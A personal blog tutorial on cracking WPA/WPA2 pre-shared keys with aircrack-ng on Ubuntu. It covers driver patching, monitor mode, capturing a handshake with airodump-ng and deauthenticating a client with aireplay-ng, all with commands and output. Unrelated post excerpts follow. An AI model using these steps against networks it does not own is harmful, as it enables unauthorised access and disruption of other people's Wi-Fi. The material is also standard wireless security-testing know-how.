Skip to main content

aircrack-ng (rt2x00 Mac80211 Linux wireless stack) in Ubuntu Trusty 14.04 ( LTS

Ubuntu is actually installed in a Virtualbox virtual machine on Mac OS X Yosemite 10.10 (10.10.2). Before proceeding read the important intro below from

Install aircrack-ng suite.

$ sudo apt-get install aircrack-ng

It should install and provide the following.

# dpkg -s aircrack-ng
Package: aircrack-ng
Status: install ok installed
Priority: optional
Section: net
Installed-Size: 2167
Maintainer: Ubuntu Developers
Architecture: amd64
Version: 1:1.1-6
Depends: libc6 (>= 2.15), libgcrypt11 (>= 1.4.5), libsqlite3-0 (>= 3.5.9), zlib1g (>= 1:1.1.4), wireless-tools, iw
Recommends: wget
Description: wireless WEP/WPA cracking utilities
 aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a
 40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets
 have been gathered. Also it can attack WPA1/2 networks with some advanced
 methods or simply by brute force.
 It implements the standard FMS attack along with some optimizations,
 thus making the attack much faster compared to other WEP cracking tools.
 It can also fully use a multiprocessor system to its full power in order
 to speed up the cracking process.
 aircrack-ng is a fork of aircrack, as that project has been stopped by
 the upstream maintainer.
Original-Maintainer: Carlos Alberto Lopez Perez

# air
airbase-ng              airdriver-ng            airodump-ng-oui-update
aircrack-ng             aireplay-ng             airolib-ng
airdecap-ng             airmon-ng               airserv-ng
airdecloak-ng           airodump-ng             airtun-ng

Patch the wi-fi card driver. Note that I am patching the Mac80211 driver in Ubuntu 14.04 (14.04.1). This is the new wireless stack of the Linux kernel. It is included in the kernel since 2.6.22, but drivers are only included since 2.6.24. This is my kernel version.

# uname -a
Linux ubuntu 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:36:28 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

I have the Hawking HWUG1 USB Wi-fi with a supported chipset (Ralink rt73). See the compatibility list.

sudo apt-get update && apt-get upgrade -y
sudo apt-get install linux-headers-$(uname -r) -y
cd /usr/src/
sudo wget
sudo tar xvfJ backports-3.17.1-1.tar.xz
cd backports-3.17.1-1
sudo apt-get install patch
sudo wget
sudo wget -Ocompatdrivers_chan_qos_frag.patch
sudo patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
sudo patch -p1  < compatdrivers_chan_qos_frag.patch
sudo make defconfig-wifi
sudo make
sudo make install
sudo update-initramfs -u

Mirror of --

Mirror of --

Plug the card and this is my ifconfig.

# ifconfig wlan
wlan0     Link encap:UNSPEC  HWaddr 00-XX-XX-XX-XX-XX-XX-XX-00-00-00-00-00-00-00-00
          RX packets:175924 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:12806243 (12.8 MB)  TX bytes:0 (0.0 B)

This is the USB Wi-fi device plugged in.

# lsusb | grep Ralink
Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

Put card in monitor mode. (Notice I have the channel 11 indicated to narrow down to the channel of the AP that I want to target)

# airmon-ng start wlan0 11

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
731     dhclient

Interface       Chipset         Driver

wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Test monitor mode. Replace with AP SSID, BSSID and monitor interface (mon0).

# aireplay-ng --test -e AztechXXX -a 00:11:22:CA:A5:44 mon0
11:53:30  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
11:53:30  Trying broadcast probe requests...
11:53:30  Injection is working!
11:53:32  Found 1 AP

11:53:32  Trying directed probe requests...
11:53:32  00:11:22:CA:A5:44 - channel: 11 - 'AztechXXX'
11:53:33  Ping (min/avg/max): 4.545ms/19.723ms/45.179ms Power: -56.60
11:53:33  30/30: 100%

Start airodump-ng to collect authentication handshake. Replace channel, BSSID, and wireless interface. More hints here (READ THE IMPORTANT INTRO BELOW)

# airodump-ng --channel 11 --bssid 00:11:22:CA:A5:44 -w psk wlan0

Here what it looks like if a wireless client is connected to the network:

  CH  11 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:11:22:CA:A5:44
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  00:11:22:CA:A5:44   39 100       51      116   14   9  54  WPA CCMP   PSK  AztechXXX                           
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
  00:11:22:CA:A5:44  00:0F:B5:FD:FB:C2   35     0      116  
In the screen above, notice the “WPA handshake: 00:11:22:CA:A5:44” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  11 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  00:11:22:CA:A5:44   39 100       51        0    0   9  54  WPA CCMP   PSK  AztechXXX                         
  BSSID              STATION            PWR  Lost  Packets  Probes        

Use aireplay-ng to deauthenticate the wireless client. More hints from

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following.

-c is the client. -a is the AP.

# aireplay-ng -0 1 -a 00:11:22:CA:A5:44 -c 00:0F:B5:FD:FB:C2 wlan0
16:05:49  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
16:05:50  Sending 64 directed DeAuth. STMAC: [00:0F:B5:FD:FB:C2] [ 0| 0 ACKs]

Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

To crack the PSK follow Step 4 in

Intro from


This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial. 
WPA/WPA2 supports many types of authentication beyond pre-shared keys.  aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.
The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.
IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.


mapawo said…
Let us report this to DTI. I WILL DO IT TOMOROOW.

Anonymous said…
@mapawo maybe you made this comment in the wrong article?

Popular posts from this blog

Globe's HOOQ.TV an (unethical) scam!!

After being terribly disappointed with the subscription stage and after also after a very disappointing test drive (at least Netflix tries to be do-no-evil), I am now very disappointed with the un-subscription of with Globe.

Globe sends me a message:

Hi! We'd like to remind you that your free HOOQ will end in 7 days on 10/27/2015. Upon expiry, your subscription will auto-renew to the paid version for P149 per month. If you don't want the paid version, text HOOQ STOP to 8888. before the expiry date. Thank you!

I send the HOOQ STOP to 888 and received:

Sorry, you have entered an invalid keyword. Please make sure your keyword is correct with no extra characters and spaces. For more info on promos, dial *143#, FREE from your Globe/TM mobile phone.

I called Globe Support (211).

Here's the scam:

- GoSurf 999 comes with the HOOQ Free Plan

- After the Free HOOQ Plan (which you did not use because it sucks) expires, it will auto-renew without your consent (!!! UNETHICAL !!!…

Use Private Internet Access (PIA) in DigitalOcean

tags: PrivateInternetAccess, Digital Ocean, VPS, VPN

This runs the PIA VPN using OpenVPN all from the command line.

sudo apt-get install openvpn network-manager-openvpn Not sure if you need network-manager-openvpn.

sudo wget Extract. Move ca.crt and crl.pem to /etc/openvpn

Move "Hong Kong.ovpn" to "/etc/openvpn/Hong Kong.config" for example.

Modified the following lines.

auth-user-pass /etc/openvpn/login.conf route-up /etc/openvpn/
These are the contents of these files.

# cat /etc/openvpn/login.conf username password
Replace with your username and password.

# cat  #!/bin/bash
ip route flush table 100 ip route flush cache ip rule add from x.x.x.x table 100 ip route add table 100 to y.y.y.y/y dev ethX ip route add table 100 default via z.z.z.z
Replace x.x.x.x with your public IP address, y.y.y.y/y with your subnet. Compute using Hint: Input public IP and netmask, y…

ld: unrecognized option '--hash-style=both'

gcc -Wl,,-export-dynamic obj_linux-native/socketdev_listener.o \
contiki-linux-native.a -o testv6.linux-native
/usr/local/bin/ld: unrecognized option '--hash-style=both'
/usr/local/bin/ld: use the --help option for usage information
collect2: ld returned 1 exit status

If you look closely, the error is something related to the local gcc not using the host's linker (ld).

$ which gcc

$ which ld

For some reason, I messed my compiler path. To synchronized gcc to use the host's dynamic linker (i.e. /usr/bin/ld), set the environment variable COMPILER_PATH to /usr/bin.

$ export COMPILER_PATH=/usr/bin

$ gcc -print-prog-name=ld